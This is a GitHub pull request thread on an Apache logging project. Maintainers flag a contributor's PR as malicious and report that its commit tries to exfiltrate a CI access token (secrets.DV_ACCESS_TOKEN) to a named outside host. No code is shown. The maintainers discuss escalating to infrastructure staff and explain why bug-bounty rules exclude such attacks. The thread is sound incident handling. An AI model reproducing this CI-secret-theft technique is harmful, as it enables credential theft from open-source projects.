Skip to content

Conversation

rootd4ddy
Copy link

[A clear and concise description of what the pull request is for along with a reference to the associated issue IDs, if they exist.]

Checklist

  • Base your changes on 2.x branch if you are targeting Log4j 2; use main otherwise
  • ./mvnw verify succeeds (if it fails due to code formatting issues reported by Spotless, simply run ./mvnw spotless:apply and retry)
  • Non-trivial changes contain an entry file in the src/changelog/.2.x.x directory
  • Tests for the changes are provided
  • Commits are signed (optional, but highly recommended)

@rootd4ddy rootd4ddy closed this Sep 5, 2024
@ppkarwasz
Copy link
Contributor

This incident has been reported.

@vy
Copy link
Member

vy commented Sep 5, 2024

The attack (rootd4ddy/logging-parent@49eb3ff) attempts to hijack secrets.DV_ACCESS_TOKEN to https://z1yhfhbr.c5.rs:
image

@ppkarwasz, shall we share this with Gradle too?

Other findings

@vy vy added the malicious label Sep 5, 2024
@ppkarwasz
Copy link
Contributor

@ppkarwasz, shall we share this with Gradle too?

GE_ACCESS_TOKEN is an access token to our INFRA-hosted https://ge.apache.org Develocity instance. I notified INFRA just in case.

@rootd4ddy
Copy link
Author

rootd4ddy commented Sep 5, 2024 via email

@ppkarwasz
Copy link
Contributor

ppkarwasz commented Sep 5, 2024

@rootd4ddy,

If you are referring to our YesWeHack program, attacks against our infrastructure do not qualify for a bounty:

Program rules

...
You cannot attack our infrastructure, including our source code repositories.
...

Non-qualifying vulnerabilities

...
Everything related to the build of the project or general infrastructure topics
...

If you are testing the security awareness of ASF project teams, please contact the ASF Security Team first: they can help you with your research project and provide "stealable" secrets without us necessarily knowing it.
cc/ @raboof

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

None yet

Development

Successfully merging this pull request may close these issues.

3 participants